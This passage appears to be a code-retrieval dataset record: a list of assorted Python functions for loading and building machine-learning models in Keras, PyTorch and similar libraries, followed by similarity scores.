else:\n raise ValueError('unknown model name: %s' % cfg.model_name)\n\n # Build Decoder\n if decoder_name.lower() == 'fc':\n decoder = models.FCDecoder(in_dim=encoder.out_dim,\n hidden_dim=cfg.hidden_dim,\n n_tags=cfg.n_tags)\n elif decoder_name in ['gru', 'lstm', 'sru']:\n decoder = models.RnnDecoder(in_dim=encoder.out_dim,\n hidden_dim=cfg.hidden_dim,\n n_tags=cfg.n_tags,\n num_layers=cfg.num_layers,\n cell=decoder_name)\n\n model = models.Ner(embedder, encoder, decoder)\n\n return model", "def load_model(self, gpus=1):\r\n\t\t\r\n\t\tif self.model != None:\r\n\t\t\treturn\r\n\r\n\t\t## build the model on the CPU if parallelism is targeted\r\n\t\tif isinstance(gpus, Sequence):\r\n\t\t\tif len(gpus) != 1:\r\n\t\t\t\tdevice = \"/cpu:0\"\r\n\t\t\t\tmultigpu = True\r\n\t\t\telse:\r\n\t\t\t\tdevice = \"/gpu:{:d}\".format(gpus[0])\r\n\t\t\t\tmultigpu = False\r\n\t\telse:\r\n\t\t\tif gpus != 1:\r\n\t\t\t\tdevice = \"/cpu:0\"\r\n\t\t\t\tmultigpu = True\r\n\t\t\telse:\r\n\t\t\t\tdevice = \"/gpu:{:d}\".format(gpus)\r\n\t\t\t\tmultigpu = False\r\n\r\n\r\n\t\tif self.__prop__(\"Resume\"):\r\n\t\t\tself.model = keras.models.load_model(\r\n\t\t\t\tself.__prop__(\"SnapshotDirectory\") + self.__prop__(\"Prefix\") + self.__prop__(\"Resume\") + '.h5\"')\r\n\t\t\tself.single_model = self.model\r\n\t\t\tif multigpu:\r\n\t\t\t\tself.model = multi_gpu_model(self.model, gpus)\r\n\t\telse: \r\n\t\t\t\r\n\t\t\twith tensorflow.device(device):\r\n\t\t\t\tif self.__prop__(\"Prefix\").startswith(\"i3PosNet_VGG16\"):\r\n\t\t\t\t\tself.model = i3PosNetVGG(\r\n\t\t\t\t\t\tinput_shape=self.__prop__(\"InputShape\"), \r\n\t\t\t\t\t\tout_number=self.__prop__(\"TargetShape\"),\r\n\t\t\t\t\t\tlayer_count=self.__prop__(\"LayerCount\"), \r\n\t\t\t\t\t\tfc_layer_count=self.__prop__(\"FCLayerCount\"), \r\n\t\t\t\t\t\tfc_reg=self.__prop__(\"FCReg\"), \r\n\t\t\t\t\t\tconv_reg=self.__prop__(\"ConvReg\"), 
\r\n\t\t\t\t\t\tshrinking=self.__prop__(\"Shrinking\"),\r\n\t\t\t\t\t\tpadding=self.__prop__(\"Padding\"))\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.model = i3PosNet(image_shape, out = self.__prop__(\"TargetShape\"))\r\n\r\n\t\t\tself.single_model = self.model\r\n\t\t\tif multigpu:\r\n\t\t\t\tself.model = multi_gpu_model(self.model, gpus)\r\n\t\t\t\t\r\n\t\t\t# clear model\r\n\t\t\t# try:\r\n\t\t\t\t# del self.model\r\n\t\t\t# except:\r\n\t\t\t\t# pass\r\n\r\n\t\t\tif self.__prop__(\"Optimizer\") == \"SGD\":\r\n\t\t\t\toptimizer = SGD(\r\n\t\t\t\t\tlr=self.__prop__(\"BaseLR\"),\r\n\t\t\t\t\tdecay=self.__prop__(\"Gamma\") if self.__prop__(\"LRPolicy\") == \"decay\" else 0.,\r\n\t\t\t\t\tmomentum= self.__prop__(\"Momentum\"),\r\n\t\t\t\t\tnesterov=True)\r\n\t\t\telif self.__prop__(\"Optimizer\") == \"Adam\":\r\n\t\t\t\toptimizer = Adam(\r\n\t\t\t\t\tlr=self.__prop__(\"BaseLR\"),\r\n\t\t\t\t\tdecay=self.__prop__(\"Gamma\") if self.__prop__(\"LRPolicy\") == \"decay\" else 0.,\r\n\t\t\t\t\t# use defaults for these for now (b1 = 0.9, b2 = 0.999, e = 1e-8\r\n\t\t\t\t\tbeta_1=self.__prop__(\"Beta1\"),\r\n\t\t\t\t\tbeta_2=self.__prop__(\"Beta2\"),\r\n\t\t\t\t\tepsilon=self.__prop__(\"Epsilon\")\r\n\t\t\t\t\t)\r\n\t\t\t\r\n\t\t\tself.model.compile(loss='mean_squared_error', optimizer=optimizer)", "def setup_ml():\n # load vocabulary\n vocab = open(f\"{VOCABULARY_FILE}\", \"rb\")\n vocab = pickle.load(vocab)\n\n # transformer to preprocess images\n transform_test = transforms.Compose([ \n transforms.Resize(256), \n transforms.RandomCrop(224), \n transforms.RandomHorizontalFlip(), \n transforms.ToTensor(), \n transforms.Normalize((0.485, 0.456, 0.406), \n (0.229, 0.224, 0.225))])\n\n # Initialize the encoder and decoder, and set each to inference mode.\n encoder = EncoderCNN(EMBED_SIZE)\n encoder.eval()\n decoder = DecoderRNN(EMBED_SIZE, HIDDEN_SIZE, VOCAB_SIZE)\n decoder.eval()\n\n # load encoder\n encoder.load_state_dict(\n torch.load(\n os.path.join('./models', ENCODER_FILE),\n map_location=torch.device('cpu')\n )\n )\n\n # load decoder\n decoder.load_state_dict(\n torch.load(\n os.path.join('./models', DECODER_FILE),\n map_location=torch.device('cpu')\n )\n )\n print(\"\\n-- Model components were imported succesfully! 
-- \\n\")\n return transform_test, encoder, decoder, vocab", "def test_export_pytorch_model(self):\n pytorch_model = PyTorchLinear()\n dummy_input = torch.empty(10, 10)\n\n with io.BytesIO() as f:\n onnx_converter._export_pytorch_model(f, pytorch_model, dummy_input)", "def _load_best_model(self) -> None:\n self.trainer.resume()", "def main_strategy_2():\n en_text, de_text, train_iter, dev_iter, _ = clean_data_strategy_2()\n embedding_en, embedding_de = get_GloVe_embedding(en_text, de_text)\n model = Model(len(en_text.vocab), len(de_text.vocab), 300, embedding_en, embedding_de)\n train(model, train_iter, dev_iter)", "def setup_fixed_model():\n out = {}\n out['Q'] = Q\n out['X'] = X\n out['y'] = y\n\n return out", "def setup(self):\n print(\"setup\")\n \n self.modelToUse = 1\n if self.train:\n print(\"train\")\n else:\n print(\"no train\")\n \n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n self.envSize = 17\n \n #init model\n if self.train or not os.path.isfile(\"my-saved-model.pt\"):\n self.logger.info(\"Setting up model from scratch.\")\n if self.modelToUse == 0:\n self.policy_net = Model_global_view(self.envSize, self.envSize, 6).to(device)\n self.model = Model_global_view(self.envSize, self.envSize, 6).to(device)\n elif self.modelToUse == 1:\n self.policy_net = Model_local_view(self.envSize, self.envSize, 6).to(device)\n self.model = Model_local_view(self.envSize, self.envSize, 6).to(device)\n else:\n self.policy_net = Model_combined_view(self.envSize, self.envSize, 6).to(device)\n self.model = Model_combined_view(self.envSize, self.envSize, 6).to(device)\n self.model.load_state_dict(self.policy_net.state_dict())\n self.model.eval()\n else:\n self.logger.info(\"Loading model from saved state.\")\n with open(\"my-saved-model.pt\", \"rb\") as file:\n if self.modelToUse == 0:\n self.model = Model_global_view(self.envSize, self.envSize, 6)\n elif self.modelToUse == 1:\n self.model = Model_local_view(self.envSize, self.envSize, 6)\n else:\n self.model = Model_combined_view(self.envSize, self.envSize, 6)\n if torch.cuda.is_available():\n self.model.load_state_dict(torch.load(file))\n self.model.to(device)\n else:\n self.model.load_state_dict(torch.load(file, map_location=device))", "def __init__(self):\n self.device = torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\")\n \n self.model = models.resnet101() \n self.model.load_state_dict(torch.load(WEIGHTS_DIR))\n \n self.model.to(self.device)\n \n self.model.eval()\n \n # labels\n with open(LABELS, 'r') as f:\n self.labels = ast.literal_eval(f.read())\n \n # define data transform\n self.transform = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])", "def read_model(self):\n f = open(self.name + '_' + 'words', 'r')\n self.words = f.read()\n f.close()\n elf.words = dict(eval(self.words))\n \n f = open(self.name + '_' + 'word_lengths', 'r')\n self.word_lengths = f.read()\n f.close()\n self.word_lengths = dict(eval(self.word_lengths))\n\n f = open(self.name + '_' + 'sentence_lengths', 'r')\n self.sentence_lengths = f.read()\n f.close()\n self.sentence_lengths = dict(eval(self.sentence_lengths))\n\n f = open(self.name + '_' + 'stems', 'r')\n self.stems = f.read()\n f.close()\n self.stems = dict(eval(self.stems))\n\n f = open(self.name + '_' + 'commas_per_sentence', 'r')\n self.commas_per_sentence = f.read()\n f.close()\n self.commas_per_sentence = 
dict(eval(self.commas_per_sentence))", "def get_model():\n return UNISAL", "def __init__(self, name: str, \n model_path: str=None,\n model_online_path: str=None,\n description: str='',\n model_type: str=None) -> None:\n model = None\n if model_path:\n archive = load_archive(model_path)\n model = AllenPredictor.from_archive(archive, model_type)\n elif model_online_path:\n model = AllenPredictor.from_path(model_online_path, model_type)\n self.predictor = model\n Predictor.__init__(self, name, description, model, ['accuracy'])", "def load_model(model_name):\n if hasattr(torchvision.models, model_name):\n with torch.no_grad():\n if model_name.startswith(\"inception\"):\n height = width = 299\n mean = [0.5, 0.5, 0.5]\n std = [0.5, 0.5, 0.5]\n else:\n height = width = 224\n mean = [0.485, 0.456, 0.406]\n std = [0.229, 0.224, 0.225]\n input_shape = [1, 3, height, width]\n input_data = torch.randn(input_shape).float()\n for channel in range(3):\n input_data[:, channel] -= mean[channel]\n input_data[:, channel] /= std[channel]\n model = getattr(torchvision.models, model_name)(pretrained=True)\n model = model.float().eval()\n return model, [input_data]\n try:\n import pretrainedmodels\n if hasattr(pretrainedmodels, model_name):\n return load_pretrainedmodels(model_name)\n except ModuleNotFoundError:\n raise ModuleNotFoundError(\"Please install pretrainedmodels.pytorch\")\n raise RuntimeError(\"Model not supported\")", "def load_custom_model(model_name):\n if model_name==\"AlexNet\":\n print(\"Loading pretrained AlexNet Model\")\n model = models.alexnet()\n num_ftrs = model.classifier[6].in_features\n model.classifier[6] = nn.Linear(num_ftrs, 100)\n elif model_name==\"ResNet18\":\n print(\"Loading ResNet18 Model\")\n model = models.resnet18() #Load the pytorch. 
torchvision model\n num_ftrs = model.fc.in_features\n model.fc = nn.Linear(num_ftrs, 100) #Set it to match the ImageNet-100 Classes.\n elif model_name==\"ResNet50\":\n print(\"Loading ResNet50 Model\")\n model = models.resnet50()\n num_ftrs = model.fc.in_features\n model.fc = nn.Linear(num_ftrs, 100) #ImageNet-100 has 100 classes.\n elif model_name==\"DenseNet\":\n print(\"Loading DenseNet161 Model\")\n model = models.densenet161()\n num_ftrs = model.classifier.in_features\n model.classifier = nn.Linear(num_ftrs, 100)\n elif model_name==\"MyNet\":\n print(\"Loading Pyramid Model\")\n model = pyramid_net.create_model() # Load the model I implemented.\n\n if cfg.load_model_true: # Load the model that was stopped during training.\n model.load_state_dict(torch.load(cfg.load_model_path))\n\n return model", "def test_load_model():\n model = BERTopic(language=\"Dutch\", embedding_model=None, n_components=12)\n model.save(\"test\")\n loaded_model = BERTopic.load(\"test\")\n assert type(model) == type(loaded_model)\n assert model.language == loaded_model.language\n assert model.embedding_model == loaded_model.embedding_model\n assert model.top_n_words == loaded_model.top_n_words\n assert model.n_neighbors == loaded_model.n_neighbors\n assert model.n_components == loaded_model.n_components", "def initialize_model(model_name, num_classes, feature_extract, verbose=False):\n\n model_ft = None\n\n if model_name == \"resnet\":\n \"\"\" Resnet18\n \"\"\"\n model_ft = models.resnet18(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\n\n elif model_name == \"alexnet\":\n \"\"\" Alexnet\n \"\"\"\n model_ft = models.alexnet(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.classifier[6].in_features\n model_ft.classifier[6] = nn.Linear(num_ftrs, num_classes)\n\n elif model_name == \"vgg\":\n \"\"\" VGG11_bn\n \"\"\"\n model_ft = models.vgg11_bn(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.classifier[6].in_features\n model_ft.classifier[6] = nn.Linear(num_ftrs, num_classes)\n\n elif model_name == \"squeezenet\":\n \"\"\" Squeezenet\n \"\"\"\n with warnings.catch_warnings(): # temporarily suppress warnings about deprecated functions\n warnings.simplefilter(\"ignore\")\n model_ft = models.squeezenet1_0(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n model_ft.classifier[1] = nn.Conv2d(512, num_classes, kernel_size=(1, 1), stride=(1, 1))\n model_ft.num_classes = num_classes\n\n elif model_name == \"densenet\":\n \"\"\" Densenet\n \"\"\"\n model_ft = models.densenet121(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.classifier.in_features\n model_ft.classifier = nn.Linear(num_ftrs, num_classes)\n\n elif model_name == \"inception\":\n \"\"\" Inception v3\n Be careful, expects (299,299) sized images and has auxiliary output\n \"\"\"\n model_ft = models.inception_v3(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n # Handle the auxilary net\n num_ftrs = model_ft.AuxLogits.fc.in_features\n model_ft.AuxLogits.fc = nn.Linear(num_ftrs, num_classes)\n # Handle the primary net\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\n\n else: # Unreachable\n exit()\n\n # Gather the parameters to be optimized\n params_to_update = list(filter(lambda p: p.requires_grad, 
model_ft.parameters()))\n\n # Print model info\n if verbose:\n print()\n print(model_ft)\n print()\n print(\"Params to learn:\")\n for name, param in model_ft.named_parameters():\n if param.requires_grad:\n print('\\t', name)\n\n return model_ft, params_to_update", "def load_pretrained_model(self,model_dir):\n rnn_params = json.load(open(os.path.join(model_dir,\n \"./model.json\")))[\"rnn\"]\n\n logging.info(\"Loading model from: {}\".format(model_dir))\n self.create_training_model(model_dir = model_dir,\n **rnn_params)\n #从目录中读取神经网络参数\n self.set_model_from_file()", "def load_our_model():\n \n model = load_model('2ndMelSpecModel.h5')\n train_generator, validation_generator = make_generators()\n \n history = model.fit_generator(\n train_generator,\n steps_per_epoch= 145,\n epochs= 30,\n validation_data=validation_generator,\n validation_steps=50)\n plotHistory(history)", "def pretrained(name=\"t5_small\", lang=\"en\", remote_loc=None):\n from sparknlp.pretrained import ResourceDownloader\n return ResourceDownloader.downloadModel(T5Transformer, name, lang, remote_loc)", "def predict_only(self):", "def test_persistence_old_model(self):\n loaded = PoincareModel.load(datapath('poincare_test_3.4.0'))\n self.assertEqual(loaded.kv.syn0.shape, (239, 2))\n self.assertEqual(len(loaded.kv.vocab), 239)\n self.assertEqual(loaded.size, 2)\n self.assertEqual(len(loaded.all_relations), 200)", "def model(self):", "def model(self):", "def model(self):", "def model(self):", "def model(self):", "def set_vanilla_model(self):\n logging.debug(\"Setting vanilla model\")\n # Build model\n\n ## Embedding Layer\n word_embedding_layer = self.embed_word()\n pos_embedding_layer = self.embed_pos()\n\n ## Deep layers\n latent_layers = self.stack_latent_layers(self.num_of_latent_layers)\n\n ## Dropout\n dropout = Dropout(self.pred_dropout)\n\n ## Prediction\n predict_layer = self.predict_classes()\n\n ## Prepare input features, and indicate how to embed them\n inputs_and_embeddings = [(Input(shape = (self.sent_maxlen,),\n dtype=\"int32\",\n name = \"word_inputs\"),\n word_embedding_layer),\n (Input(shape = (self.sent_maxlen,),\n dtype=\"int32\",\n name = \"predicate_inputs\"),\n word_embedding_layer),\n (Input(shape = (self.sent_maxlen,),\n dtype=\"int32\",\n name = \"postags_inputs\"),\n pos_embedding_layer),\n ]\n\n ## Concat all inputs and run on deep network\n output = predict_layer(dropout(latent_layers(merge([embed(inp)\n for inp, embed in inputs_and_embeddings],\n mode = \"concat\",\n concat_axis = -1))))\n\n # Build model\n self.model = Model(input = map(itemgetter(0), inputs_and_embeddings),\n output = [output])\n\n # Loss\n self.model.compile(optimizer='adam',\n loss='categorical_crossentropy',\n metrics=['categorical_accuracy'])\n self.model.summary()\n\n # Save model json to file\n self.save_model_to_file(os.path.join(self.model_dir, \"model.json\"))", "def load_NMF_model():\n model = pickle.load(open(\"models/nmf_model.sav\", 'rb'))\n Q = model.components_ \n return model, Q", "def load_onnx_model(self):\n print(\"Loading Rescue Detection Model\")\n\n self.rescue_model = cv2.dnn.readNetFromONNX(os.path.join(\n os.path.dirname(os.path.realpath(__file__)),\n rescue_cnn_model_path))\n\n self.rescue_model.setPreferableTarget(Rescue_PI.preferable_target)", "def readmodel(model = 'dominguez'):\n ebl_file_path = os.path.join(os.path.split(__file__)[0],'data/')\n\n if model == 'kneiske':\n file_name = join(ebl_file_path , 'ebl_nuFnu_tanja.dat')\n elif model == 'franceschini':\n file_name = join(ebl_file_path , 
'ebl_franceschini.dat')\n elif model == 'dominguez':\n file_name = join(ebl_file_path , 'ebl_dominguez11.out')\n elif model == 'dominguez-upper':\n file_name = join(ebl_file_path , 'ebl_upper_uncertainties_dominguez11.out')\n elif model == 'dominguez-lower':\n file_name = join(ebl_file_path , 'ebl_lower_uncertainties_dominguez11.out')\n elif model == 'inoue':\n file_name = join(ebl_file_path , 'EBL_z_0_baseline.dat')\n #file_name = join(ebl_file_path , 'EBL_proper_baseline.dat')\n elif model == 'inoue-low-pop3':\n file_name = join(ebl_file_path , 'EBL_z_0_low_pop3.dat')\n #file_name = join(ebl_file_path , 'EBL_proper_low_pop3.dat')\n elif model == 'inoue-up-pop3':\n file_name = join(ebl_file_path , 'EBL_z_0_up_pop3.dat')\n #file_name = join(ebl_file_path , 'EBL_proper_up_pop3.dat')\n elif model == 'gilmore':\n file_name = join(ebl_file_path , 'eblflux_fiducial.dat')\n elif model == 'gilmore-fixed':\n file_name = join(ebl_file_path , 'eblflux_fixed.dat')\n elif model == 'cuba':\n file_name = join(ebl_file_path , 'CUBA_UVB.dat')\n elif model == 'finke':\n file_name = join(ebl_file_path , 'ebl_modelC_Finke.txt')\n else:\n raise ValueError(\"Unknown EBL model chosen!\")\n\n data = np.loadtxt(file_name)\n if model.find('inoue') >= 0:\n z = np.array([0.])\n #z = data[0,1:]\n #nuInu = data[:,1]\n lmu = data[:,0]\n nuInu = np.array([data[:,1]]).T\n raise ValueError('Inoue models not correctly implemented at the moment, choose another model')\n\n elif model.find('gilmore') >= 0:\n z = data[0,1:]\n lmu = data[1:,0] * 1e-4 # convert from Angstrom to micro meter\n nuInu = data[1:,1:] \n nuInu[nuInu == 0.] = 1e-20 * np.ones(np.sum(nuInu == 0.))\n \n # convert from ergs/s/cm^2/Ang/sr to nW/m^2/sr\n nuInu = (nuInu.T * data[1:,0]).T * 1e4 * 1e-7 * 1e9 \n\n elif model == 'cuba':\n z = data[0,1:-1]\n lmu = data[1:,0] * 1e-4\n nuInu = data[1:,1:-1]\n\n # replace zeros by 1e-40\n idx = np.where(data[1:,1:-1] == 0.)\n nuInu[idx] = np.ones(np.sum(nuInu == 0.)) * 1e-20\n\n # in erg / cm^2 / s / sr\n nuInu = (nuInu.T * c.c.value / (lmu * 1e-6)).T \n nuInu *= 1e6 # in nW / m^2 / sr\n\n # check where lmu is not strictly increasing\n idx = np.where(np.diff(lmu) == 0.)\n for i in idx[0]:\n lmu[i+1] = (lmu[i + 2] + lmu[i]) / 2.\n\n else:\n z = data[0,1:]\n lmu = data[1:,0]\n nuInu = data[1:,1:]\n if model == 'finke': \n lmu = lmu[::-1] * 1e-4\n nuInu = nuInu[::-1]\n\n return EBL(z,lmu,nuInu, model = model)", "def reconstruct_input_ext(self, model_in):", "def resnet34(pretrained=False):\n model = ResNet(BasicBlock, [3, 4, 6, 3])\n if pretrained:\n model.load_state_dict(model_zoo.load_url(model_urls['resnet34']))\n return model", "def _get_model():\n freezing = os.environ.get('NAUCSE_FREEZE', not app.config['DEBUG'])\n initialize = True\n\n try:\n g.model = app.config['NAUCSE_MODEL']\n except KeyError:\n g.model = init_model()\n app.config['NAUCSE_MODEL'] = g.model\n else:\n if freezing:\n # Model already initialized; don't look for changes\n return\n\n # (Re-)initialize model\n\n g.model.load_licenses(Path(app.root_path).parent / 'licenses')\n g.model.load_local_courses(Path(app.root_path).parent)\n\n if freezing:\n g.model.freeze()", "def main():\n df = prepro_last()\n X, y = train_build(df)\n fit_store(X, y)" ]
[ "0.64619243", "0.63850045", "0.63135374", "0.6303723", "0.62750506", "0.62338805", "0.6216982", "0.6216971", "0.6207287", "0.61998534", "0.6164519", "0.6160022", "0.61489826", "0.6124723", "0.61036414", "0.60924315", "0.6061764", "0.60476965", "0.60332507", "0.60278857", "0.6027397", "0.60240763", "0.60190946", "0.6016885", "0.60148865", "0.6012249", "0.6012162", "0.5999457", "0.59943676", "0.59920955", "0.5962204", "0.59577227", "0.59352607", "0.59347224", "0.5916451", "0.5915794", "0.59142876", "0.59110755", "0.5908786", "0.5902896", "0.5901237", "0.58980024", "0.5886278", "0.5885651", "0.588398", "0.5871296", "0.58682543", "0.5867478", "0.58674335", "0.58545023", "0.5852693", "0.58387935", "0.5827888", "0.5824709", "0.5816585", "0.58156294", "0.58146495", "0.5811856", "0.5806191", "0.5798871", "0.5798801", "0.57984173", "0.5780826", "0.57792413", "0.57676697", "0.5760369", "0.5757007", "0.57541287", "0.57505244", "0.5744312", "0.5737968", "0.57360774", "0.57337976", "0.57331485", "0.57282186", "0.5725215", "0.5724573", "0.57235384", "0.5719074", "0.5715155", "0.5714414", "0.5713664", "0.57117325", "0.5709275", "0.57074606", "0.57062346", "0.57042783", "0.5700574", "0.56996024", "0.56996024", "0.56996024", "0.56996024", "0.56996024", "0.569126", "0.56859314", "0.5685509", "0.56850445", "0.5681664", "0.56806296", "0.5679945", "0.5679292" ]
0.0
-1
return checkpoints for recomputing
def get_checkpoints(self):
    # recompute checkpoints
    return self._checkpoints
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def checkpoint():", "def checkpoint_set():\n checkpoints.append(list())", "def get_all_overall_checkpoint(cls):\n return cls.create_all_overall_checkpoint()", "def get_checkpoint_list(cls):\n return cls.create_checkpoint_list()", "def checkpoint(self):\r\n return self._checkpoint", "def finish_checkpoint(self):\n return self.this_evaluation.checkpoint", "def create_all_overall_checkpoint(cls):\n return DB.read_all_overall_checkpoint()", "def callstack_now():\n return checkpoints[-1]", "def parse_checkpoint(self):\n pass", "def checkpoint(self):\n return self.__checkpoint", "def get_checkpoint_snapshot(self):\n try:\n __method_name = inspect.currentframe().f_code.co_name\n checkpoint = self.state.get()\n if checkpoint:\n checkpoint = json.loads(checkpoint)\n checkpoint = checkpoint.get(\"snapshot\")\n self.applogger.info(\n \"{}(method={}) : {} : Checkpoint list fetched successfully.\".format(\n consts.LOGS_STARTS_WITH, __method_name, self.function_name\n )\n )\n else:\n checkpoint = []\n self.state.post(json.dumps({\"snapshot\": checkpoint}))\n self.applogger.info(\n \"{}(method={}) : {} : Checkpoint list not found. Created new checkpoint list.\".format(\n consts.LOGS_STARTS_WITH, __method_name, self.function_name\n )\n )\n return checkpoint\n except Exception as ex:\n self.applogger.error(\n '{}(method={}) : {} : Unexpected error while getting checkpoint list: err=\"{}\"'.format(\n consts.LOGS_STARTS_WITH, __method_name, self.function_name, str(ex)\n )\n )\n raise Exception(ex)", "def get_checkpoint_data(self) -> Dict[str, Any]:\n # get ckpt file path from config.trainer.params.resume_from_checkpoint\n path = self.config.trainer.params.get(\"resume_from_checkpoint\", None)\n if path is not None:\n is_zoo = self.is_zoo_path(path)\n ckpt_filepath = path\n if is_zoo:\n folder = download_pretrained_model(path)\n ckpt_filepath = get_ckpt_path_from_folder(folder)\n ckpt = get_ckpt_from_path(ckpt_filepath)\n config = get_config_from_folder_or_ckpt(folder, ckpt)\n else:\n ckpt = get_ckpt_from_path(ckpt_filepath)\n config = None\n\n return {\n \"ckpt\": ckpt,\n \"checkpoint_path\": ckpt_filepath,\n \"is_zoo\": is_zoo,\n \"config\": config,\n }\n\n is_zoo = False\n config = None\n ckpt = None\n # get ckpt file path from config.checkpoint\n ckpt_config = self.config.checkpoint\n suffix = \"best.ckpt\" if ckpt_config.resume_best else \"current.ckpt\"\n path = os.path.join(get_mmf_env(key=\"save_dir\"), suffix)\n ckpt_filepath = None\n resume_from_specified_path = (\n ckpt_config.resume_file is not None or ckpt_config.resume_zoo is not None\n ) and (not ckpt_config.resume or not PathManager.exists(path))\n if resume_from_specified_path:\n if ckpt_config.resume_file and PathManager.exists(ckpt_config.resume_file):\n ckpt_filepath = ckpt_config.resume_file\n elif ckpt_config.resume_zoo is not None:\n is_zoo = True\n folder = download_pretrained_model(ckpt_config.resume_zoo)\n ckpt_filepath = get_ckpt_path_from_folder(folder)\n ckpt = get_ckpt_from_path(ckpt_filepath)\n config = get_config_from_folder_or_ckpt(folder, ckpt)\n else:\n raise RuntimeError(f\"{ckpt_config.resume_file} doesn't exist\")\n\n if ckpt_config.resume and PathManager.exists(path):\n ckpt_filepath = path\n\n if ckpt_filepath is not None:\n ckpt = get_ckpt_from_path(ckpt_filepath)\n\n return {\n \"ckpt\": ckpt,\n \"checkpoint_path\": ckpt_filepath,\n \"is_zoo\": is_zoo,\n \"config\": config,\n }", "def get_checkpoint(self, metrics):\n assert all(metric in metrics for metric in [\"acc1\", \"acc5\", \"acc10\", \"unsupervised\", 
\"total\"]), \"Not all metrics found\"\n checkpoint = OrderedDict()\n for metric in metrics:\n checkpoint[metric] = metrics[metric]\n checkpoint['map_params'] = self.transform.state_dict()\n return checkpoint", "def _restore(self):\n\n output_path = self.output_path + '/checkpoints/'\n checkpoint = tf.train.latest_checkpoint(output_path)\n if checkpoint:\n self.saver.restore(self.session, save_path=checkpoint)\n restored_step = int(checkpoint.split('-')[-1]) # Robust enough?\n return restored_step\n logging.info('Starting training from scratch.')\n return 0", "def find_latest_checkpoint(self) -> Tuple[str, str]:\n return {}", "def create_checkpoint_list(cls):\n checkpoint_data = DB.read_checkpoint_record_list()\n return [Checkpoint(*checkpoint) for checkpoint in checkpoint_data]", "def get_checkpoint():\n\timport numpy as np\n\n\tcheckpoint = []\n\tfor directory in directories:\n\t\ttry: # try to find folder\n\t\t\tos.chdir('./'+directory)\n\t\texcept:\n\t\t\tcontinue\n\t\tcontents = os.listdir('./')\n\t\tif contents == []: # if folder is empty\n\t\t\tprint(\"No data for\", directory)\n\t\t\tos.chdir('..')\n\t\t\tcontinue\n\t\tcounter = []\n\t\tfor entry in contents:\n\t\t\tentry = entry.split('.')\n\t\t\tnum = entry[0][2:]\n\t\t\ttry: # excludes files that aren't of type x-y.jpg\n\t\t\t\tnum = int(num)\n\t\t\t\tcounter.append(num)\n\t\t\texcept:\n\t\t\t\tcontinue\n\t\tcheckpoint.append(max(counter))\n\t\tos.chdir('..')\n\tcheckpoint = np.mean(checkpoint)\n\treturn checkpoint", "def find_checkpoint(self, checkpoints, current_time):\n checkpoint_line_len = N.zeros(len(checkpoints), dtype=float)\n checkpoint_distances = N.zeros(len(checkpoints), dtype=float)\n checkpoint_chosen = False\n\n for i in range(len(checkpoints)):\n checkpoint_line_len[i] = checkpoints[i].get_line_length()\n checkpoint_distances[i] = self._calc_distance(checkpoints[i].location)\n \n min_length = N.min(checkpoint_line_len)\n min_dist = N.min(checkpoint_distances)\n # If the min_length of all lines is > 0, divide all lengths by the min_length\n if (min_length > 0):\n checkpoint_line_len = checkpoint_line_len / min_length\n # Same idea for the distances\n if (min_dist > 0):\n checkpoint_ratios = checkpoint_distances / min_dist\n else:\n checkpoint_ratios = checkpoint_distances\n \n # Add these values together, and choose the smallest value\n checkpoint_rankings = checkpoint_ratios + checkpoint_line_len\n min_index = N.argmin(checkpoint_rankings)\n # found the target checkpoint, set that as the target_checkpoint\n checkpoint_candidate = checkpoints[min_index]\n if self.checkpoint_target is None or self.checkpoint_target is not checkpoint_candidate:\n if self.checkpoint_target is not None:\n print(\"Attendee:\", self.attendee_id, \"has changed checkpoint target from:\",\\\n self.checkpoint_target.get_location(), \"to checkpoint at:\",\\\n checkpoint_candidate.get_location())\n self.checkpoint_target = checkpoint_candidate\n self._calc_checkpoint_arrival(checkpoint_distances[min_index], current_time)\n self._set_checkpoint_vector(self.checkpoint_target.get_location())\n \n return self.checkpoint_target", "def variable_progression():\n\t# files = glob.glob('parameter_checkpoints/epoch-*[!.meta]')\n\tfiles = glob.glob('parameter_checkpoints/epoch-*')\n\n\t# reorder epochs by 'human order' otherwise it would order it as 1,110,12,...\n\t# http://stackoverflow.com/questions/5967500/how-to-correctly-sort-a-string-with-a-number-inside\n\tdef atoi(text):\n\t return int(text) if text.isdigit() else text\n\n\tdef 
natural_keys(text):\n\t '''\n\t alist.sort(key=natural_keys) sorts in human order\n\t http://nedbatchelder.com/blog/200712/human_sorting.html\n\t (See Toothy's implementation in the comments)\n\t '''\n\t return [ atoi(c) for c in re.split('(\\d+)', text) ]\n\n\tfiles.sort(key=natural_keys)\n\n\tx, W, bh, bv = rbm.get_variables()\n\ttrainable_vars = [W, bh, bv]\n\n\tsaver = tf.train.Saver(trainable_vars)\t# restore the weights and biases of the trained model\n\n\tweights = []\n\tbhs = []\n\tbvs = []\n\twith tf.Session() as sess:\n\t\tinit = tf.initialize_all_variables()\t\n\t\tsess.run(init)\n\t\t# iterate through each saved epoch checkpoint, and add the W, bh, and bv matrices to their\n\t\t# respective lists\n\t\tfor f in files:\n\t\t\tsaver.restore(sess, f)\t\t# load the saved weights and biases from a given epoch checkpoint file\n\t\t\tweights.append(W.eval())\t\n\t\t\tbhs.append(bh.eval())\n\t\t\tbvs.append(bv.eval())\n\n\treturn weights, bhs, bvs", "def fit(self):\n # Iterate and train.\n step_file = self.checkpointer.get_step_file()\n start_step = Pickle.load(open(step_file, 'rb'))\n for step in xrange(start_step, self.train_size // self.train_batch_size):\n print 'Step No.:', step\n # Checkpoint tensorflow variables for recovery\n if step % self.checkpointer.get_checkpoint_steps() == 0:\n print 'Checkpointing: Saving Tensorflow variables'\n self.saver.save(self.sess, 